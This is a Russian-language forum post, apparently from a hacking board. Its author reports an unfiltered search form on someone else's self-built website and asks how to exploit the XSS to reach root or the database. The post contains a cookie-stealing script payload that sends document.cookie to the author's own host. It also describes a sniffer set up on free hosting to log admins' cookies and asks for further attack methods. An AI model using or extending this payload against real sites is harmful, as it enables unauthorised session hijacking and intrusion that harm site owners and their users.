День добрый.

Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.

Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.

Пробовал также сделать собственный сниффер.
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.

Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь.